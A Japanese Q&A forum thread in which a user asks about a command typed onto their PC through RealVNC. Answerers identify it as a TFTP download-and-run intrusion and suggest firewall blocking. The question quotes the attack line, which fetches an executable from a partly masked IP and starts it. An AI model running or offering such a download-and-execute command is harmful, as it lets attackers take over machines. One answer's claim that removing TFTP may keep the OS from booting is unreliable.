- ベストアンサー
一体、何のコマンドなのでしょうか?
リモートコントロールソフトrealvncをインストールして使用していたところ、操作される側のPC画面上で突然、「ファイル名を指定して実行」が開き、以下のコマンドが勝手に打ち込まれました。 %comspec% /c tftp -i 69.○○○.95.○○○ GET aipqrb.exe & start aipqrb ○の箇所には数字が入っておりipアドレスのようです。 これって何のコマンドなのでしょうか?
- ash01
- お礼率64% (376/586)
- その他(ソフトウェア)
- 回答数4
- ありがとう数2
- みんなの回答 (4)
- 専門家の回答
質問者が選んだベストアンサー
その他の回答 (3)
- qaz_qwerty_me
- ベストアンサー率19% (214/1115)
TFTP はかなり基本的な機能なので安易に削除するとOSが起動しないなどの副作用が考えられるので慎重に行って下さい。 ただし、ハッカーも、そのような点をついて今回のような方法でハッキンを行うので、#3さんの回答のように、69.○○○.95.○○○をFWで遮断するのがベストな対策と思います。 参考にTFTPの解説のURLを参照して下さい。 http://e-words.jp/w/TFTP.html *セキュリティー・ホールになるプロトコルとして結構 有名です ^ ^;
お礼
削除はやめておきます。 ファイルを見ると8月ぐらいからあったみたいなので。 ありがとうございました。
- bardfish
- ベストアンサー率28% (5029/17765)
tftpというFTPソフトを起動し、69.○○○.95.○○○というホストに接続してaipqrb.exeというプログラムをダウンロードし、実行する。 と言うものだと思います。 http://e-words.jp/w/TFTP.html なんか、危険な香りがしますね… 心配なら、そのIPアドレスをFirewallで遮断すればひとまず安心です。
補足
どうもビンゴのようです。 そういえばファイヤーウォールが「Trivial File Transfer Protocol app」を検知したので遮断しました。 早速、当該IPアドレスも遮断しておきました。 system32の中にあるtftp.exeは削除したほうがいいのでしょうか?
- qaz_qwerty_me
- ベストアンサー率19% (214/1115)
予想ですが・・・ > %comspec% /c tftp -i 69.○○○.95.○○○ GET aipqrb.exe & start aipqrb 『tftp』という部分が危険ですねぇ~ 誰かがPCをリブートして乗っ取るような感じに思われます。VNCですから知人などが操作しているなら安全ですが、見ず知らずの第三者が、このようなコマンドを実行しようとしたら・・・ハッキングとしか思えないです。
補足
入力された上記のコマンドをコピーして、コマンドプロンプトが開いたのですぐに閉じて、再起動しました。 その後、realvncの設定でパスワードやアクセスコントロールを設定しました。オンラインウイルススキャンも感染なし、aipqrb.exeというファイルも見つかりませんでした。大丈夫でしょうか?他に何か確認する方法はないでしょうか?
関連するQ&A
- コマンドプロンプトが立ち上がらない
質問させてください。 windows2003Serverを現在使用しているのですが コマンドプロンプトが開きません。 [スタート]→[ファイル名を指定して実行]でcmdまたは [スタート]→[全てのプログラム]→[アクセサリ]で 開こうとしているのですが クリックしても何の反応もありません。 タスクマネージャーから見ても 実行しているようには見えません。 又、コマンドプロンプトだけではなく exeファイルも実行できないものもあり 症状はコマンドプロンプトのときと同じです。 原因がわからないため 大変困っています。 又、ウイルスにかかったのではないかとも 思っています。 同じ症状または原因や対策を 知っていらっしゃる方いらっしゃいましたら 教えていただけないでしょうか。 以上、大変お手数ですが 宜しくお願い致します。
- ベストアンサー
- Windows系OS
- コマンドプロンプト
スタートメニューのアクセサリからコマンドプロンプトを実行すると C:\WINDOWS\system32\cmd.exe ReadProcessMemory要求または WriteProcessMemory要求の一部だけを完了しました。 と出てコマンドプロンプトが起動されないんですがどうすればいいんでしょうか?
- 締切済み
- Windows XP
- コマンドプロンプトで「ls」が認識されません!
検索しても回答が得られなかったので、質問させていただきます。 環境変数をいじったあとで、 アクセサリ→コマンドプロンプトで起動はできますが、「ls」と入力しても 「lsは、内部コマンドまたは外部コマンド、操作可能なプログラムまたはバッチ ファイルとして認識されていません。」 と出てきて、lsコマンドが使えません。 環境変数をいじる前は、できていました。 「cd」,「dir」のコマンドは使用可能です。 システム環境変数で 変数名 ComSpec 変数値 %SystemRoot%\system32\cmd.exe はあります。 OSはXPです。 何が原因か分からないので、どなたか分かる方がいましたら、ご回答お願いします。
- ベストアンサー
- Windows系OS
- 管理者権限を与えたコマンド実行
管理者権限の無いユーザーにパスワードを教えずにコマンドを実行させる方法がないか検討しています。 rusas コマンドでは可能なようですが、パスワードをプロンプト要求されることと、それを回避する方法も難しいようです。 psexecコマンドではユーザー名とパスワードをパラメタで渡すことが可能なようですが、リモートコンピュータでの実行が前提になっているのか、ローカルコンピュータ上での動作がうまくいかないようです。 やりたいことは、ネットワークで繋がっていないPCに対してのIPアドレスの変更です。 IPアドレスを変更していない状態で、PCを異動先へ持って行ってしまったため、リモートでの操作ができないためです。 netshコマンドでアドレスの変更は実現できるようですが、これをローカル管理者権限で動かすバッチさえできれば、そのバッチをcom化してパスワードが見えないようにすればなんとかなるのではないかと思っています。 psexec -u localuser -p password 動作させたいコマンド と入れると、 最後に動作させたいコマンド exited with error code 1 と出てきてエラーになります。 フルパスで入れると、エラーは出なくなります。 これで問題無いとしても、今度はフルパスで決まった場所にコマンドをコピーするのに苦労しますが、他に方法は無いでしょうか?
- 締切済み
- ネットワーク
- Linuxのコマンドラインについて
次のことを教えてください。 (1) コマンドラインからだけの操作でファイルをダウンロードし、インストールする方法はありますか? (2) コマンドラインの操作ログを残す方法を教えて下さい。 (3) 特定のIPアドレスからのリモートアクセスによるログインに対してだけのみ、rootで入ることができる(ssh_configファイルで言うPermitRootLogin yesの)設定方法 あるいは、そのようなことが説明してあるサイトがあれば教えて下さい。
- ベストアンサー
- Linux系OS
- コマンドプロントを実行してipアドレスを表示しようとしてipcofig
コマンドプロントを実行してipアドレスを表示しようとしてipcofig /allとうって実行しようとしたら’ipcofig'は、内部コマンドまたは外部コマンド、操作可能なプログラムまたはバッチファイルとして認識されていませんというメッセージがでてきて実行できませんでした。どうしたらいいですか
- ベストアンサー
- Windows XP
- Windowsでコマンドを短縮入力したい
入力を省略す補助ツールを作りたいのです。 いつもファイル一式を作ったり修正したりするのに、 C:\>[生成実行.exe] [生成コマンド] [命令A] C:\>[生成実行.exe] [生成コマンド] [命令B] C:\>[生成実行.exe] [生成コマンド] [命令C] C:\>[生成実行.exe] [生成コマンド] [命令D] と打っています。 よくやる操作なので、できるだけ最短入力できるよう効率化したいです。 「入力省略.bat」を作り、「ファイル名を指定して実行」から「[入力省略.bat] [案件名]」と入力すると C:\> [命令A] C:\> [命令B] C:\> [命令C] C:\> [命令D] と略せるといいのですが…。 入力された値を必ずあるアプリケーションに渡すあたりの、何かヒントを頂けると嬉しいです。
- 締切済み
- Windows 7
- コマンドラインからのIPアドレスの設定
はじめまして、最近パソコンを買いまして、 コマンドラインからIPアドレスを設定したいのですが、 いまいちよくわかりません。 ネットなどで調べコマンドを打ってみたりしたのですが・・・ 機種:DOS/V OS:Windows-7 コマンド netsh interface ip set address "ローカル エリア接続" static 192.168.~.~ 255.255.255.0 192.168.~.~ などでコマンドを打つのですが、 「要求された操作には、権限の昇格が必要です。 管理者として実行してください」 とエラーメッセージが出ます。 さらにネットで、runasとかsuとか調べたのですが使い方が良くわかりません。 はじめから管理者で実行するなどありましたがコマンドで切り替えて操作したいので質問します。 どうかよろしくお願いします。
- ベストアンサー
- ネットトラブル
- Shell とcmd.exe /c start
Shell "cmd.exe /c start " & Label1.Caption ラベルにURLを設定し、クリックした時にURLに飛ぶとあります。 コードの理解が難しく、お助け頂けませんか。 プログラミングもPCもド素人ですのでご了承下さい。。。 Shell:実行可能なプログラム(この場合ならcmd.exe?)を実行し、実行が完了するとプログラムのタスクIDを示す(このタスクidでプログラムを操作することになるのだろうか?)。 cmd.exe:コマンドプロンプト cmd.exe/c:コマンドプロンプトで特定のコマンド(URL先へ飛ぶ?)を実行後に終了させる? Label1.Caption:ラベルの内容(URL) startがわからない。何をstartするためのstart? cmd.exeのstart(起動)をShellが実行して、URL先に飛ぶ命令は残りのコードにある? 参照ページでも歓迎です。宜しくお願いします。
- ベストアンサー
- Visual Basic
- コマンドプロンプトでのマクロ使用
バッチファイルを作成しているんですが ディレクトリを指定する箇所が多いので、簡潔に cdコマンドで移動する処理をd1,d2のようにしてマクロにしたいと思うのですが思うようにいきません。 コマンドプロンプト上に手打ちならば動くのですが バッチファイル上に組み込むと動きません。 doskeyを用いて、以下のような使用を考えています。(一部のみ) doskey d1=cd C:\aaa doskey d2=cd C:\bbb echo ***起動 d1 start ***.exe d2 start ***.exe
- 締切済み
- Windows XP
お礼
恐ろしいですね。 airqrb.exeは検索しましたが見つかりませんでした。 スタートアップも大丈夫そうです。 便利ですが諸刃の剣ですね。色々勉強になりました。 ありがとうございました。